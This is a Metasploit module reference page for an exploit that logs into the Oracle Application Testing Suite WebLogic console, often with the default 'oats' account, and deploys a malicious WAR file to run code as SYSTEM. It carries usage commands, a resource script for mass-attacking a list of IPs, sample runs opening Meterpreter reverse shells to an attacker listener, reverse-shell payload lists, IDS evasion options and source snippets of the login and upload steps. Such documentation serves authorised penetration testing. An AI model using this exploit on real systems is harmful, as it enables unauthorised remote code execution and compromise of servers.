Oracle Application Testing Suite WebLogic Server Administration Console War Deployment - Metasploit


This page contains detailed information about how to use the exploit/windows/http/oats_weblogic_console metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Oracle Application Testing Suite WebLogic Server Administration Console War Deployment
Module: exploit/windows/http/oats_weblogic_console
Source code: modules/exploits/windows/http/oats_weblogic_console.rb
Disclosure date: 2019-03-13
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): java
Supported platform(s): Java
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8088, 8443, 8880, 8888
List of CVEs: CVE-2007-2699

This module abuses a feature in WebLogic Server's Administration Console to install a malicious Java application in order to gain remote code execution. Authentication is required, however by default, Oracle ships with a "oats" account that you could log in with, which grants you administrator access.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


Using oats_weblogic_console against a single host

Normally, you can use exploit/windows/http/oats_weblogic_console this way:

msf > use exploit/windows/http/oats_weblogic_console
msf exploit(oats_weblogic_console) > show targets
    ... a list of targets ...
msf exploit(oats_weblogic_console) > set TARGET target-id
msf exploit(oats_weblogic_console) > show options
    ... show and set options ...
msf exploit(oats_weblogic_console) > exploit

Using oats_weblogic_console against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your oats_weblogic_console will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/windows/http/oats_weblogic_console")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • OATSPASSWORD: The password for the admin console

Knowledge Base


Vulnerable Application


Oracle Application Testing Suite (OATS) is a comprehensive, integrated testing solution for web applications, web services, packaged Oracle applications, and Oracle databases. OATS is part of an application deployed in the WebLogic service on port 8088, which also includes these tools: Administrator, OpenScript, Oracle Load Testing, and Oracle Test Manager.

In the administrator console, the deployement feature can be abused to upload an arbitrary WAR file, allowing remote code execution under the context of SYSTEM. Authentication is required.

The following is the exact setup I used to test and analyze the vulnerability:

  • Windows Server 2008 R2 x64 (other Windows systems are also supported)
    • .Net Framework 3.5 enabled (from add/remove features)
    • IE ESC (from Server Manager) disabled
    • 8GB of RAM (at least more than 4GB will be used to run OATS)
    • Duel-Core processor
  • oats-win64-full-13.3.0.1.262.zip (x86 did not work for me)
  • Jdk-7u21-windows-x64.exe
  • OracleXE112_Win64.zip (Newer version 18c did not work well for me)
  • Firefox (I had to install this because IE on Win2k8 is completely outdated)
  • Adobe Flash installed (IE ESC needs to be disabled in order to install this)

For installation instructions, please refer to the Oracle Application Testing Suite Installation Guide.

Notes

For Oracle Application Testing Suite (OATS), you may use the auxiliary/gather/oats_downloadservlet_traversal module to download the server's encrypted credentials, decrypt them using a third-party tool, and then use this module to gain remote code execution.

Scenarios


msf5 exploit(windows/http/oats_weblogic_console) > check
[*] 172.16.135.128:8088 - The target service is running, but could not be validated.
msf5 exploit(windows/http/oats_weblogic_console) > run

[*] Started reverse TCP handler on 172.16.135.1:4444 
[+] Logged in as oats:VeryPhat1337
[*] Ready for war. Codename "lawrence" at 6256 bytes
[*] FRSC value: 0x59c5c771ae7d83c8440d7c45d2610dca5a0aa304a9e89e4c
[*] Server replies: "The file lawrence.war has been uploaded successfully to C:\\OracleATS\\oats\\servers\\AdminServer\\upload"
[+] Operation "lawrence" is a go!
[*] Code 200 on "lawrence" request
[*] Sending stage (53866 bytes) to 172.16.135.128
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.128:49337) at 2019-05-18 18:07:27 -0500
[+] Successfully undeployed lawrence.war

meterpreter >

Go back to menu.

Msfconsole Usage


Here is how the windows/http/oats_weblogic_console exploit module looks in the msfconsole:

msf6 > use exploit/windows/http/oats_weblogic_console

[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(windows/http/oats_weblogic_console) > show info

       Name: Oracle Application Testing Suite WebLogic Server Administration Console War Deployment
     Module: exploit/windows/http/oats_weblogic_console
   Platform: Java
       Arch: java
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2019-03-13

Provided by:
  Steven Seeley
  sinn3r <[email protected]>

Module side effects:
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   WebLogic Server Administration Console 12 or prior

Check supported:
  Yes

Basic options:
  Name          Current Setting  Required  Description
  ----          ---------------  --------  -----------
  OATSPASSWORD                   yes       The password for the admin console
  OATSUSERNAME  oats             yes       The username for the admin console
  Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT         8088             yes       The target port (TCP)
  SSL           false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI     /                yes       The route for the Rails application
  VHOST                          no        HTTP server virtual host

Payload information:

Description:
  This module abuses a feature in WebLogic Server's Administration 
  Console to install a malicious Java application in order to gain 
  remote code execution. Authentication is required, however by 
  default, Oracle ships with a "oats" account that you could log in 
  with, which grants you administrator access.

Module Options


This is a complete list of options available in the windows/http/oats_weblogic_console exploit:

msf6 exploit(windows/http/oats_weblogic_console) > show options

Module options (exploit/windows/http/oats_weblogic_console):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   OATSPASSWORD                   yes       The password for the admin console
   OATSUSERNAME  oats             yes       The username for the admin console
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         8088             yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /                yes       The route for the Rails application
   VHOST                          no        HTTP server virtual host

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   WebLogic Server Administration Console 12 or prior

Advanced Options


Here is a complete list of advanced options supported by the windows/http/oats_weblogic_console exploit:

msf6 exploit(windows/http/oats_weblogic_console) > show advanced

Module advanced options (exploit/windows/http/oats_weblogic_console):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DefaultOatsPath         C:\OracleATS                                        yes       The default path for OracleATS
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (java/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AESPassword                                   no        Password for encrypting communication
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   JavaMeterpreterDebug         false            no        Run the payload in debug mode, with logging enabled
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   Spawn                        2                yes       Number of subprocesses to spawn
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the windows/http/oats_weblogic_console module can exploit:

msf6 exploit(windows/http/oats_weblogic_console) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   WebLogic Server Administration Console 12 or prior

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the windows/http/oats_weblogic_console exploit:

msf6 exploit(windows/http/oats_weblogic_console) > show payloads

Compatible Payloads
===================

   #   Name                                     Disclosure Date  Rank    Check  Description
   -   ----                                     ---------------  ----    -----  -----------
   0   payload/generic/custom                                    normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                            normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                         normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/java/jsp_shell_bind_tcp                           normal  No     Java JSP Command Shell, Bind TCP Inline
   4   payload/java/jsp_shell_reverse_tcp                        normal  No     Java JSP Command Shell, Reverse TCP Inline
   5   payload/java/meterpreter/bind_tcp                         normal  No     Java Meterpreter, Java Bind TCP Stager
   6   payload/java/meterpreter/reverse_http                     normal  No     Java Meterpreter, Java Reverse HTTP Stager
   7   payload/java/meterpreter/reverse_https                    normal  No     Java Meterpreter, Java Reverse HTTPS Stager
   8   payload/java/meterpreter/reverse_tcp                      normal  No     Java Meterpreter, Java Reverse TCP Stager
   9   payload/java/shell/bind_tcp                               normal  No     Command Shell, Java Bind TCP Stager
   10  payload/java/shell/reverse_tcp                            normal  No     Command Shell, Java Reverse TCP Stager
   11  payload/java/shell_reverse_tcp                            normal  No     Java Command Shell, Reverse TCP Inline
   12  payload/multi/meterpreter/reverse_http                    normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   13  payload/multi/meterpreter/reverse_https                   normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)

Evasion Options


Here is the full list of possible evasion options supported by the windows/http/oats_weblogic_console exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(windows/http/oats_weblogic_console) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

No response from server


Here is a relevant code snippet related to the "No response from server" error message:

130:	    res = send_request_cgi({
131:	      'method' => 'GET',
132:	      'uri'    => uri
133:	    })
134:	
135:	    fail_with(Failure::Unknown, 'No response from server') unless res
136:	    set_admin_console_session(res)
137:	
138:	    uri = normalize_uri(target_uri.path, 'console', 'j_security_check')
139:	    res = send_request_cgi({
140:	      'method' => 'POST',

No response while trying to log in


Here is a relevant code snippet related to the "No response while trying to log in" error message:

146:	          'j_password'           => datastore['OATSPASSWORD'],
147:	          'j_character_encoding' => 'UTF-8'
148:	        }
149:	    })
150:	
151:	    fail_with(Failure::Unknown, 'No response while trying to log in') unless res
152:	    fail_with(Failure::NoAccess, 'Failed to login') unless is_logged_in?(res)
153:	    store_valid_credential(user: datastore['OATSUSERNAME'], private: datastore['OATSPASSWORD'])
154:	    set_admin_console_session(res)
155:	  end
156:	

Failed to login


Here is a relevant code snippet related to the "Failed to login" error message:

147:	          'j_character_encoding' => 'UTF-8'
148:	        }
149:	    })
150:	
151:	    fail_with(Failure::Unknown, 'No response while trying to log in') unless res
152:	    fail_with(Failure::NoAccess, 'Failed to login') unless is_logged_in?(res)
153:	    store_valid_credential(user: datastore['OATSUSERNAME'], private: datastore['OATSPASSWORD'])
154:	    set_admin_console_session(res)
155:	  end
156:	
157:	  def get_deploy_frsc

No response while retrieving FRSC


Here is a relevant code snippet related to the "No response while retrieving FRSC" error message:

171:	        'uri'      => normalize_uri(target_uri.path, req[:path]),
172:	        'cookie'   => "ADMINCONSOLESESSION=#{login_spec.admin_console_session}",
173:	        'vars_get' => req[:vars]
174:	      })
175:	
176:	      fail_with(Failure::Unknown, 'No response while retrieving FRSC') unless res
177:	    end
178:	
179:	    html = res.get_html_document
180:	    hidden_input = html.at('input[@name="ChangeManagerPortletfrsc"]')
181:	    frsc_attr = hidden_input.respond_to?(:attributes) ? hidden_input.attributes['value'] : nil

No response from <ACTION>


Here is a relevant code snippet related to the "No response from <ACTION>" error message:

198:	          'AppApplicationInstallPortletselectedAppPath' => app_path,
199:	          'AppApplicationInstallPortletfrsc' => frsc
200:	        }
201:	    })
202:	
203:	    fail_with(Failure::Unknown, "No response from #{action}") unless res
204:	  end
205:	
206:	  def do_upload_app_action
207:	    action = '/com/bea/console/actions/app/install/uploadApp'
208:	    ctype = 'application/octet-stream'

No response from <ACTION>


Here is a relevant code snippet related to the "No response from <ACTION>" error message:

226:	        },
227:	       'ctype'   => "multipart/form-data; boundary=#{post_data.bound}",
228:	       'data'    => post_data.to_s
229:	    })
230:	
231:	    fail_with(Failure::Unknown, "No response from #{action}") unless res
232:	    print_response_message(res)
233:	  end
234:	
235:	  def do_app_select_action
236:	    action = '/com/bea/console/actions/app/install/appSelected'

No response from <ACTION>


Here is a relevant code snippet related to the "No response from <ACTION>" error message:

250:	          'AppApplicationInstallPortletselectedAppPath' => app_path,
251:	          'AppApplicationInstallPortletfrsc'            => frsc
252:	        }
253:	    })
254:	
255:	    fail_with(Failure::Unknown, "No response from #{action}") unless res
256:	    print_response_message(res)
257:	  end
258:	
259:	  def do_style_select_action
260:	    action = '/com/bea/console/actions/app/install/targetStyleSelected'

No response from <ACTION>


Here is a relevant code snippet related to the "No response from <ACTION>" error message:

272:	          'AppApplicationInstallPortlettargetStyle' => 'Application',
273:	          'AppApplicationInstallPortletfrsc'        => frsc
274:	        }
275:	    })
276:	
277:	    fail_with(Failure::Unknown, "No response from #{action}") unless res
278:	  end
279:	
280:	  def do_finish_action
281:	    action = '/com/bea/console/actions/app/install/finish'
282:	

No response from <ACTION>


Here is a relevant code snippet related to the "No response from <ACTION>" error message:

296:	          'AppApplicationInstallPortletplanStagingStyle' => 'Default',
297:	          'AppApplicationInstallPortletfrsc'             => frsc
298:	        }
299:	    })
300:	
301:	    fail_with(Failure::Unknown, "No response from #{action}") unless res
302:	    print_response_message(res)
303:	
304:	    # 302 is a good enough indicator of a successful upload, otherwise
305:	    # the server would actually return a 200 with an error message.
306:	    res.code == 302

Unable to successfully undeploy <WAR_NAME>.war


Here is a relevant code snippet related to the "Unable to successfully undeploy <WAR_NAME>.war" error message:

360:	    })
361:	
362:	    if res && res.code == 302
363:	      print_good("Successfully undeployed #{war_name}.war")
364:	    else
365:	      print_warning("Unable to successfully undeploy #{war_name}.war")
366:	      print_warning('You may want to do so manually.')
367:	    end
368:	  end
369:	
370:	  def cleanup

You may want to do so manually.


Here is a relevant code snippet related to the "You may want to do so manually." error message:

361:	
362:	    if res && res.code == 302
363:	      print_good("Successfully undeployed #{war_name}.war")
364:	    else
365:	      print_warning("Unable to successfully undeploy #{war_name}.war")
366:	      print_warning('You may want to do so manually.')
367:	    end
368:	  end
369:	
370:	  def cleanup
371:	    undeploy_war if is_cleanup_ready

Target does not have the login page we are looking for.


Here is a relevant code snippet related to the "Target does not have the login page we are looking for." error message:

377:	    super
378:	  end
379:	
380:	  def exploit
381:	    unless check == Exploit::CheckCode::Detected
382:	      print_status('Target does not have the login page we are looking for.')
383:	      return
384:	    end
385:	
386:	    do_login
387:	    print_good("Logged in as #{datastore['OATSUSERNAME']}:#{datastore['OATSPASSWORD']}")

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


  • Steven Seeley
  • sinn3r

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.